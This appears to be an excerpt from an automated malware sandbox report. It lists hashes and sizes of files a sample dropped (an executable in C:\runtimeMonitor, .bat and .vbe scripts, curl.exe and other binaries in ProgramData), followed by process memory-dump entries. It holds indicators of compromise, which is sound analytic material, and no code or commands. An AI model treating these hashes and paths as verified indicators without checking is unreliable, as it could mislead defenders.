SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\runtimeMonitor\ComdriverSvc.exeFilesize
1.0MB
MD518557c37efdef82648622fa471a2db2f
SHA1e72f774a0bd16c3d7074a826f7f1711845738972
SHA25604142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27
SHA512fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b
-
C:\runtimeMonitor\PsYm20I.batFilesize
36B
MD513e52857c334ca3b14c44cffece40607
SHA1eaa9d704385cec30f7841ef6d3c051b225007dbe
SHA2564e457ab29e89a42a805b427decc8e571e15d857061c939ee7aa8d0bcaff25a6c
SHA5124b0c23faad00995254ae02b5ce55de33344f66120f1e8640d80059d7cf77f3b149c46ae24bdd459881ef332331cc59e6fc50e55c1fa1a585f63dbf5badb93337
-
C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbeFilesize
198B
MD5f3fbd4e6a0097ff2d729be2b6e494e80
SHA1abed54083af60944e4628718061fa6b9ce402594
SHA256b7d74a96173fd177dceead637138814738b68799b018437dbd4ba20213977e56
SHA512f9a7f899cdc423a3214072de0a2858f212e15d9055b22cbb8536d20cea3fe199e3f44f3183c6d3e41e85a04b2b47e0497ead13eeb49e67f91e44cb19fe4a0f57
-
C:\windows\tasks\run.batFilesize
338B
MD520a377ca25c7fcdff75b3720ba83e11c
SHA1ad3ceb92df33714c7d3f517a77b1086797d72c47
SHA256280e5ccacd1622f61cfd675f4ae1204790bd5aea648d0e51145d01a772d792ad
SHA512b4f2d5a1c8cbdfd7cc3f6d106735e816572bb0a177b302263fa9267625bca7d77f49b5e86252c3632ce9e05e4e5ba7730e7555ac465ed5b46f913de4739cecc6
-
\??\c:\programdata\curl.exeFilesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
\??\c:\programdata\migrate.exeFilesize
6.6MB
MD54d877cab8a19afea517ba4436805ce77
SHA17210160bd527a3b726ad0686613bff358823de41
SHA256e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d
SHA512af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc
-
\??\c:\programdata\st.batFilesize
3KB
MD5d7c8216954b5eb6037dd1a45dd57a4f0
SHA1a7edc98e44c55070d28941bfc9f7d88a95576041
SHA256cf5405b85d6f3e6365707af3302610d84596c23f0f7717c43eb11c1ac702bce7
SHA5123338f2c096137b568cf1f3ac1ae6ab4be2b2baa7ed08aaa4b7fe6b72ddca231d456a3fa41c817b6dc14abc62c062a390a440b8a3fc6a1ab5243f7f4fc12f29af
-
\??\c:\programdata\wsappy.exeFilesize
3.8MB
MD59a1d9fe9b1223273c314632d04008384
SHA1665cad3ed21f6443d1adacf18ca45dfaa8f52c99
SHA2560f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359
SHA5123ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5
-
memory/260-310-0x0000000000000000-mapping.dmp
-
memory/628-173-0x0000000000000000-mapping.dmp
-
memory/1068-245-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/1068-304-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/1068-225-0x0000000000000000-mapping.dmp
-
memory/1108-181-0x0000000000000000-mapping.dmp
-
memory/1108-228-0x0000000000000000-mapping.dmp
-
memory/1108-275-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/1108-248-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/1428-277-0x0000000000000000-mapping.dmp
-
memory/1584-170-0x0000000000000000-mapping.dmp
-
memory/1592-180-0x0000000000000000-mapping.dmp
-
memory/1612-163-0x0000000000000000-mapping.dmp
-
memory/1684-297-0x0000000000000000-mapping.dmp
-
memory/1684-149-0x0000000000000000-mapping.dmp
-
memory/1684-153-0x000000006F160000-0x000000006F1AC000-memory.dmpFilesize
304KB
-
memory/1764-311-0x0000000000000000-mapping.dmp
-
memory/1824-157-0x0000000000000000-mapping.dmp
-
memory/2020-206-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/2020-201-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/2020-298-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/2276-169-0x0000000000000000-mapping.dmp
-
memory/2744-154-0x0000000000000000-mapping.dmp
-
memory/2832-264-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/2832-240-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/2832-222-0x0000000000000000-mapping.dmp
-
memory/2900-305-0x0000000000000000-mapping.dmp
-
memory/2944-168-0x0000000000000000-mapping.dmp
-
memory/3248-189-0x0000000000300000-0x0000000001359000-memory.dmpFilesize
16.3MB
-
memory/3248-187-0x0000000000000000-mapping.dmp
-
memory/3248-194-0x0000000000300000-0x0000000001359000-memory.dmpFilesize
16.3MB
-
memory/3248-208-0x0000000000300000-0x0000000001359000-memory.dmpFilesize
16.3MB
-
memory/3260-184-0x0000000000000000-mapping.dmp
-
memory/3260-244-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/3260-253-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/3260-224-0x0000000000000000-mapping.dmp
-
memory/3472-174-0x0000000000000000-mapping.dmp
-
memory/3532-159-0x0000000000000000-mapping.dmp
-
memory/3548-314-0x0000000000000000-mapping.dmp
-
memory/3616-213-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/3616-303-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/3616-209-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/3668-182-0x0000000000000000-mapping.dmp
-
memory/3768-229-0x0000016DDD0B0000-0x0000016DDD0D2000-memory.dmpFilesize
136KB
-
memory/3768-232-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/3768-255-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/3768-218-0x0000000000000000-mapping.dmp
-
memory/3996-279-0x0000000000000000-mapping.dmp
-
memory/3996-281-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/3996-293-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/4024-220-0x0000000000000000-mapping.dmp
-
memory/4024-233-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4024-265-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4080-179-0x0000000000000000-mapping.dmp
-
memory/4104-219-0x0000000000000000-mapping.dmp
-
memory/4104-263-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4104-235-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4116-226-0x0000000000000000-mapping.dmp
-
memory/4116-266-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4116-272-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4196-243-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4196-223-0x0000000000000000-mapping.dmp
-
memory/4196-274-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4272-295-0x0000000000000000-mapping.dmp
-
memory/4308-177-0x0000000000000000-mapping.dmp
-
memory/4420-221-0x0000000000000000-mapping.dmp
-
memory/4420-257-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4420-238-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4504-178-0x0000000000000000-mapping.dmp
-
memory/4520-306-0x0000000000000000-mapping.dmp
-
memory/4552-315-0x0000000000000000-mapping.dmp
-
memory/4644-160-0x0000000000000000-mapping.dmp
-
memory/4672-192-0x0000000000000000-mapping.dmp
-
memory/4704-211-0x0000000000000000-mapping.dmp
-
memory/4708-262-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4708-217-0x0000000000000000-mapping.dmp
-
memory/4708-230-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4724-176-0x0000000000000000-mapping.dmp
-
memory/4732-175-0x0000000000000000-mapping.dmp
-
memory/4748-296-0x0000000000000000-mapping.dmp
-
memory/4784-203-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4784-198-0x00000000003E0000-0x00000000004EC000-memory.dmpFilesize
1.0MB
-
memory/4784-200-0x000000001CC10000-0x000000001CC60000-memory.dmpFilesize
320KB
-
memory/4784-234-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4784-195-0x0000000000000000-mapping.dmp
-
memory/4820-236-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4820-260-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4820-216-0x0000000000000000-mapping.dmp
-
memory/4856-139-0x00000000063B0000-0x00000000063E2000-memory.dmpFilesize
200KB
-
memory/4856-137-0x0000000005800000-0x0000000005866000-memory.dmpFilesize
408KB
-
memory/4856-142-0x0000000007720000-0x0000000007D9A000-memory.dmpFilesize
6.5MB
-
memory/4856-144-0x0000000007150000-0x000000000715A000-memory.dmpFilesize
40KB
-
memory/4856-133-0x0000000002A20000-0x0000000002A56000-memory.dmpFilesize
216KB
-
memory/4856-134-0x0000000005160000-0x0000000005788000-memory.dmpFilesize
6.2MB
-
memory/4856-135-0x0000000004F30000-0x0000000004F52000-memory.dmpFilesize
136KB
-
memory/4856-136-0x00000000050D0000-0x0000000005136000-memory.dmpFilesize
408KB
-
memory/4856-132-0x0000000000000000-mapping.dmp
-
memory/4856-146-0x0000000007310000-0x000000000731E000-memory.dmpFilesize
56KB
-
memory/4856-138-0x0000000005DE0000-0x0000000005DFE000-memory.dmpFilesize
120KB
-
memory/4856-141-0x0000000006390000-0x00000000063AE000-memory.dmpFilesize
120KB
-
memory/4856-140-0x000000006F160000-0x000000006F1AC000-memory.dmpFilesize
304KB
-
memory/4856-143-0x00000000070E0000-0x00000000070FA000-memory.dmpFilesize
104KB
-
memory/4856-147-0x0000000007420000-0x000000000743A000-memory.dmpFilesize
104KB
-
memory/4856-145-0x0000000007360000-0x00000000073F6000-memory.dmpFilesize
600KB
-
memory/4856-148-0x0000000007400000-0x0000000007408000-memory.dmpFilesize
32KB
-
memory/4924-186-0x0000000000000000-mapping.dmp
-
memory/4936-331-0x000002E52D080000-0x000002E52D0A0000-memory.dmpFilesize
128KB
-
memory/4936-330-0x000002E52D040000-0x000002E52D080000-memory.dmpFilesize
256KB
-
memory/4936-332-0x000002E52D080000-0x000002E52D0A0000-memory.dmpFilesize
128KB
-
memory/4936-329-0x000002E52D000000-0x000002E52D020000-memory.dmpFilesize
128KB
-
memory/4936-287-0x0000000000000000-mapping.dmp
-
memory/4992-247-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/4992-227-0x0000000000000000-mapping.dmp
-
memory/4992-270-0x00007FFECE6F0000-0x00007FFECF1B1000-memory.dmpFilesize
10.8MB
-
memory/5208-316-0x0000000000000000-mapping.dmp
-
memory/5208-318-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/5208-322-0x0000000000B40000-0x0000000001B99000-memory.dmpFilesize
16.3MB
-
memory/5216-231-0x0000000000000000-mapping.dmp
-
memory/5248-302-0x00007FFECE810000-0x00007FFECF2D1000-memory.dmpFilesize
10.8MB
-
memory/5248-299-0x0000000000000000-mapping.dmp
-
memory/5248-323-0x00007FFECE810000-0x00007FFECF2D1000-memory.dmpFilesize
10.8MB
-
memory/5248-324-0x000000001DD40000-0x000000001DF02000-memory.dmpFilesize
1.8MB
-
memory/5488-239-0x0000000000000000-mapping.dmp
-
memory/5552-294-0x0000000000000000-mapping.dmp
-
memory/5552-241-0x0000000000000000-mapping.dmp
-
memory/5588-313-0x0000000000000000-mapping.dmp
-
memory/5596-292-0x0000000000000000-mapping.dmp
-
memory/5692-307-0x0000000000000000-mapping.dmp
-
memory/5832-246-0x0000000000000000-mapping.dmp
-
memory/5888-249-0x0000000000000000-mapping.dmp
-
memory/5888-278-0x0000000073650000-0x000000007369C000-memory.dmpFilesize
304KB
-
memory/5932-309-0x0000000000000000-mapping.dmp
-
memory/5940-308-0x0000000000000000-mapping.dmp